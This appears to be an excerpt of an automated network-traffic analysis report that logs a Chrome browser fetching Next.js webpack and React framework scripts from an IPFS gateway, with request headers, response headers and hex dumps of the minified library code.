                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 75 2e 68 31 2e 56 49 45 57 5f 4c 4d 5f 44 45 54 41 49 4c 53 5f 44 41 53 48 42 4f 41 52 44 2c 7b 7d 29 2c 6a 28 21 79 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 22 49 6e 66 69 6e 69 74 79 22 21 3d 3d 53 26 26 53 3c 31 65 34 3f 28 30 2c 76 2e 6a 73 78 29 28 70 2e 42 2c 7b 76 61 6c 75 65 3a 53 2c 70 65 72 63 65 6e 74 3a 21 30 2c 76 61 72 69 61 6e 74 3a 22 73 65 63 6f 6e 64 61 72 79 31 32 22 2c 63 6f 6c 6f 72
                                                                                                                                                                                                                                                  Data Ascii: :hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function(){g(u.h1.VIEW_LM_DETAILS_DASHBOARD,{}),j(!y)},children:[(0,v.jsx)(a.Z,{sx:{mr:2},children:"Infinity"!==S&&S<1e4?(0,v.jsx)(p.B,{value:S,percent:!0,variant:"secondary12",color


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  79192.168.2.549798209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC507OUTGET /_next/static/chunks/webpack-7cee0530881530e6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 5533
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiatibnwwgd7zbf7d2liffc535qh7cyevg6sdsnjb3os75klpglcpm"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/webpack-7cee0530881530e6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiatibnwwgd7zbf7d2liffc535qh7cyevg6sdsnjb3os75klpglcpm
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 98749
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 66 36 62 66 31 63 33 33 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42f6bf1c33a-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1304INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 63 29 7b 76 61 72 20 72 3d 74 5b 63 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 74 5b 63 5d 3d 7b 69 64 3a 63 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 66 3d 21 30 3b 74 72 79 7b 65 5b 63 5d 2e 63 61 6c 6c 28 61 2e 65 78 70 6f 72 74 73 2c 61 2c 61 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 66 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 66 26 26 64 65 6c 65 74 65 20 74 5b 63 5d 7d 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 65 64 3d 21 30 2c 61 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 61 6d 64 4f 3d 7b 7d 2c 66 75 6e 63
                                                                                                                                                                                                                                                  Data Ascii: !function(){"use strict";var e={},t={};function n(c){var r=t[c];if(void 0!==r)return r.exports;var a=t[c]={id:c,loaded:!1,exports:{}},f=!0;try{e[c].call(a.exports,a,a.exports,n),f=!1}finally{f&&delete t[c]}return a.loaded=!0,a.exports}n.m=e,n.amdO={},func
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 74 29 6e 2e 6f 28 74 2c 63 29 26 26 21 6e 2e 6f 28 65 2c 63 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 63 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 74 5b 63 5d 7d 29 7d 2c 6e 2e 66 3d 7b 7d 2c 6e 2e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 2e 66 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 63 29 7b 72 65 74 75 72 6e 20 6e 2e 66 5b 63 5d 28 65 2c 74 29 2c 74 7d 29 2c 5b 5d 29 29 7d 2c 6e 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 34 32 35 34 3d 3d 3d 65 3f 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 34 32 35 34 2d 61 63 30
                                                                                                                                                                                                                                                  Data Ascii: {for(var c in t)n.o(t,c)&&!n.o(e,c)&&Object.defineProperty(e,c,{enumerable:!0,get:t[c]})},n.f={},n.e=function(e){return Promise.all(Object.keys(n.f).reduce((function(t,c){return n.f[c](e,t),t}),[]))},n.u=function(e){return 4254===e?"static/chunks/4254-ac0
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 62 61 30 32 22 2c 36 36 32 33 3a 22 65 31 62 63 66 30 66 38 33 37 63 38 34 35 65 33 22 2c 36 37 35 35 3a 22 65 38 64 65 31 36 32 36 31 36 32 34 36 31 39 30 22 2c 36 37 38 32 3a 22 35 64 66 65 66 37 38 39 33 64 64 35 62 65 61 34 22 2c 37 32 38 33 3a 22 66 63 35 65 65 31 62 38 36 32 38 66 33 33 62 66 22 2c 37 33 39 39 3a 22 35 62 36 66 62 66 65 65 33 31 65 35 37 35 34 33 22 2c 37 35 36 31 3a 22 33 66 63 65 34 66 31 34 33 36 66 32 31 33 30 37 22 2c 37 36 30 33 3a 22 35 38 63 62 32 37 30 31 30 65 30 61 31 32 64 38 22 2c 37 37 35 36 3a 22 62 61 35 64 35 63 31 32 63 36 31 63 33 38 31 64 22 2c 37 38 32 38 3a 22 62 63 34 32 62 65 32 36 61 39 65 39 34 62 62 37 22 2c 37 38 38 38 3a 22 34 36 37 30 62 65 62 38 37 30 32 32 31 66 62 35 22 2c 38 31 30 30 3a 22 33 38 39
                                                                                                                                                                                                                                                  Data Ascii: ba02",6623:"e1bcf0f837c845e3",6755:"e8de162616246190",6782:"5dfef7893dd5bea4",7283:"fc5ee1b8628f33bf",7399:"5b6fbfee31e57543",7561:"3fce4f1436f21307",7603:"58cb27010e0a12d8",7756:"ba5d5c12c61c381d",7828:"bc42be26a9e94bb7",7888:"4670beb870221fb5",8100:"389
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 2e 73 72 63 3d 63 29 2c 65 5b 63 5d 3d 5b 72 5d 3b 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 64 2e 6f 6e 65 72 72 6f 72 3d 64 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6c 29 3b 76 61 72 20 72 3d 65 5b 63 5d 3b 69 66 28 64 65 6c 65 74 65 20 65 5b 63 5d 2c 64 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 64 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 64 29 2c 72 26 26 72 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 28 6e 29 7d 29 29 2c 74 29 72 65 74 75 72 6e 20 74 28 6e 29 7d 2c 6c 3d 73 65 74 54 69 6d 65 6f 75 74 28 73 2e 62 69 6e 64 28 6e 75 6c 6c 2c 76 6f 69 64 20 30 2c 7b 74 79 70 65 3a 22 74 69 6d 65 6f 75 74 22 2c 74 61 72 67 65 74
                                                                                                                                                                                                                                                  Data Ascii: .src=c),e[c]=[r];var s=function(t,n){d.onerror=d.onload=null,clearTimeout(l);var r=e[c];if(delete e[c],d.parentNode&&d.parentNode.removeChild(d),r&&r.forEach((function(e){return e(n)})),t)return t(n)},l=setTimeout(s.bind(null,void 0,{type:"timeout",target
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC122INData Raw: 28 75 29 7d 2c 63 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 3b 63 2e 66 6f 72 45 61 63 68 28 74 2e 62 69 6e 64 28 6e 75 6c 6c 2c 30 29 29 2c 63 2e 70 75 73 68 3d 74 2e 62 69 6e 64 28 6e 75 6c 6c 2c 63 2e 70 75 73 68 2e 62 69 6e 64 28 63 29 29 7d 28 29 7d 28 29 3b
                                                                                                                                                                                                                                                  Data Ascii: (u)},c=self.webpackChunk_N_E=self.webpackChunk_N_E||[];c.forEach(t.bind(null,0)),c.push=t.bind(null,c.push.bind(c))}()}();


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  80192.168.2.549797209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC509OUTGET /_next/static/chunks/framework-79bce4a3a540b080.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 130002
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidula2dcyjivfqf3m2suqkg364bz7jat6qdpuzfmj36fpe5ckypiq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/framework-79bce4a3a540b080.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreidula2dcyjivfqf3m2suqkg364bz7jat6qdpuzfmj36fpe5ckypiq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028480
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 66 37 39 66 31 31 38 62 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42f79f118b8-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 37 37 34 5d 2c 7b 36 34 34 34 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 39 36 30 38 36 29 2c 61 3d 6e 28 36 33 38 34 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 65 2c 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 2b 3d 22 26 61 72 67 73
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 48 54 4d 4c 20 64 65 66 61 75 6c 74 56 61 6c 75 65 20 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 20 69 6e 6e 65 72 48 54 4d 4c 20 73 75 70 70 72 65 73 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 57 61 72 6e 69 6e 67 20 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 20 73 74 79 6c 65 22 2e 73 70 6c 69 74 28 22 20 22 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 67 5b 65 5d 3d 6e 65 77 20 76 28 65 2c 30 2c 21 31 2c 65 2c 6e 75 6c 6c 2c 21 31 2c 21 31 29 7d 29 29 2c 5b 5b 22 61 63 63 65 70 74 43 68 61 72 73 65 74 22 2c 22 61 63 63 65 70 74 2d 63 68 61 72 73 65 74 22 5d 2c 5b 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6c 61 73 73 22 5d 2c 5b 22 68 74 6d 6c 46 6f 72 22 2c 22 66 6f 72 22 5d 2c 5b 22 68 74 74 70
                                                                                                                                                                                                                                                  Data Ascii: HTML defaultValue defaultChecked innerHTML suppressContentEditableWarning suppressHydrationWarning style".split(" ").forEach((function(e){g[e]=new v(e,0,!1,e,null,!1,!1)})),[["acceptCharset","accept-charset"],["className","class"],["htmlFor","for"],["http
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 70 65 72 74 79 28 74 29 3f 67 5b 74 5d 3a 6e 75 6c 6c 3b 28 6e 75 6c 6c 21 3d 3d 6c 3f 30 3d 3d 3d 6c 2e 74 79 70 65 3a 21 72 26 26 28 32 3c 74 2e 6c 65 6e 67 74 68 26 26 28 22 6f 22 3d 3d 3d 74 5b 30 5d 7c 7c 22 4f 22 3d 3d 3d 74 5b 30 5d 29 26 26 28 22 6e 22 3d 3d 3d 74 5b 31 5d 7c 7c 22 4e 22 3d 3d 3d 74 5b 31 5d 29 29 29 7c 7c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 6e 26 26 30 3d 3d 3d 6e 2e 74 79 70 65 29 72 65 74 75 72 6e 21 31 3b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 66 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 22
                                                                                                                                                                                                                                                  Data Ascii: perty(t)?g[t]:null;(null!==l?0===l.type:!r&&(2<t.length&&("o"===t[0]||"O"===t[0])&&("n"===t[1]||"N"===t[1])))||(function(e,t,n,r){if(null===t||"undefined"===typeof t||function(e,t,n,r){if(null!==n&&0===n.type)return!1;switch(typeof t){case"function":case"
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 2d 78 20 68 6f 72 69 7a 2d 6f 72 69 67 69 6e 2d 78 20 69 6d 61 67 65 2d 72 65 6e 64 65 72 69 6e 67 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 20 6c 69 67 68 74 69 6e 67 2d 63 6f 6c 6f 72 20 6d 61 72 6b 65 72 2d 65 6e 64 20 6d 61 72 6b 65 72 2d 6d 69 64 20 6d 61 72 6b 65 72 2d 73 74 61 72 74 20 6f 76 65 72 6c 69 6e 65 2d 70 6f 73 69 74 69 6f 6e 20 6f 76 65 72 6c 69 6e 65 2d 74 68 69 63 6b 6e 65 73 73 20 70 61 69 6e 74 2d 6f 72 64 65 72 20 70 61 6e 6f 73 65 2d 31 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 20 72 65 6e 64 65 72 69 6e 67 2d 69 6e 74 65 6e 74 20 73 68 61 70 65 2d 72 65 6e 64 65 72 69 6e 67 20 73 74 6f 70 2d 63 6f 6c 6f 72 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 20 73 74 72 69 6b 65 74 68 72 6f 75 67 68 2d 70 6f 73 69 74 69 6f 6e 20 73 74 72
                                                                                                                                                                                                                                                  Data Ascii: -x horiz-origin-x image-rendering letter-spacing lighting-color marker-end marker-mid marker-start overline-position overline-thickness paint-order panose-1 pointer-events rendering-intent shape-rendering stop-color stop-opacity strikethrough-position str
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 2c 21 30 29 7d 29 29 3b 76 61 72 20 6b 3d 72 2e 5f 5f 53 45 43 52 45 54 5f 49 4e 54 45 52 4e 41 4c 53 5f 44 4f 5f 4e 4f 54 5f 55 53 45 5f 4f 52 5f 59 4f 55 5f 57 49 4c 4c 5f 42 45 5f 46 49 52 45 44 2c 53 3d 36 30 31 30 33 2c 45 3d 36 30 31 30 36 2c 5f 3d 36 30 31 30 37 2c 78 3d 36 30 31 30 38 2c 43 3d 36 30 31 31 34 2c 50 3d 36 30 31 30 39 2c 4e 3d 36 30 31 31 30 2c 54 3d 36 30 31 31 32 2c 4c 3d 36 30 31 31 33 2c 7a 3d 36 30 31 32 30 2c 4f 3d 36 30 31 31 35 2c 52 3d 36 30 31 31 36 2c 4d 3d 36 30 31 32 31 2c 46 3d 36 30 31 32 38 2c 49 3d 36 30 31 32 39 2c 44 3d 36 30 31 33 30 2c 55 3d 36 30 31 33 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 66 6f 72 29 7b 76 61 72 20 41 3d 53 79 6d
                                                                                                                                                                                                                                                  Data Ascii: ,!0)}));var k=r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED,S=60103,E=60106,_=60107,x=60108,C=60114,P=60109,N=60110,T=60112,L=60113,z=60120,O=60115,R=60116,M=60121,F=60128,I=60129,D=60130,U=60131;if("function"===typeof Symbol&&Symbol.for){var A=Sym
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 7d 63 61 74 63 68 28 69 29 7b 72 3d 69 7d 65 28 29 7d 7d 63 61 74 63 68 28 69 29 7b 69 66 28 69 26 26 72 26 26 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 69 2e 73 74 61 63 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 69 2e 73 74 61 63 6b 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 61 3d 72 2e 73 74 61 63 6b 2e 73 70 6c 69 74 28 22 5c 6e 22 29 2c 6f 3d 6c 2e 6c 65 6e 67 74 68 2d 31 2c 75 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 31 3c 3d 6f 26 26 30 3c 3d 75 26 26 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 3b 29 75 2d 2d 3b 66 6f 72 28 3b 31 3c 3d 6f 26 26 30 3c 3d 75 3b 6f 2d 2d 2c 75 2d 2d 29 69 66 28 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d 29 7b 69 66 28 31 21 3d 3d 6f 7c 7c 31 21 3d 3d 75 29 64 6f 7b 69 66 28 6f 2d 2d 2c 30 3e 2d 2d 75 7c 7c 6c 5b 6f 5d 21 3d 3d 61 5b 75 5d
                                                                                                                                                                                                                                                  Data Ascii: }catch(i){r=i}e()}}catch(i){if(i&&r&&"string"===typeof i.stack){for(var l=i.stack.split("\n"),a=r.stack.split("\n"),o=l.length-1,u=a.length-1;1<=o&&0<=u&&l[o]!==a[u];)u--;for(;1<=o&&0<=u;o--,u--)if(l[o]!==a[u]){if(1!==o||1!==u)do{if(o--,0>--u||l[o]!==a[u]
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 29 7b 63 61 73 65 22 62 6f 6f 6c 65 61 6e 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 63 61 73 65 22 6f 62 6a 65 63 74 22 3a 63 61 73 65 22 73 74 72 69 6e 67 22 3a 63 61 73 65 22 75 6e 64 65 66 69 6e 65 64 22 3a 72 65 74 75 72 6e 20 65 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 22 7d 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 28 65 3d 65 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 22 69 6e 70 75 74 22 3d 3d 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 28 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 74 7c 7c 22 72 61 64 69 6f 22 3d 3d 3d 74
                                                                                                                                                                                                                                                  Data Ascii: }catch(n){}}return null}function K(e){switch(typeof e){case"boolean":case"number":case"object":case"string":case"undefined":return e;default:return""}}function Y(e){var t=e.type;return(e=e.nodeName)&&"input"===e.toLowerCase()&&("checkbox"===t||"radio"===t
                                                                                                                                                                                                                                                  2024-09-28 04:11:46 UTC1369INData Raw: 6c 74 56 61 6c 75 65 3f 22 22 3a 74 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 72 3d 6e 75 6c 6c 21 3d 74 2e 63 68 65 63 6b 65 64 3f 74 2e 63 68 65 63 6b 65 64 3a 74 2e 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 3b 6e 3d 4b 28 6e 75 6c 6c 21 3d 74 2e 76 61 6c 75 65 3f 74 2e 76 61 6c 75 65 3a 6e 29 2c 65 2e 5f 77 72 61 70 70 65 72 53 74 61 74 65 3d 7b 69 6e 69 74 69 61 6c 43 68 65 63 6b 65 64 3a 72 2c 69 6e 69 74 69 61 6c 56 61 6c 75 65 3a 6e 2c 63 6f 6e 74 72 6f 6c 6c 65 64 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 74 2e 74 79 70 65 7c 7c 22 72 61 64 69 6f 22 3d 3d 3d 74 2e 74 79 70 65 3f 6e 75 6c 6c 21 3d 74 2e 63 68 65 63 6b 65 64 3a 6e 75 6c 6c 21 3d 74 2e 76 61 6c 75 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 65 28 65 2c 74 29 7b 6e 75 6c 6c 21 3d 28 74 3d
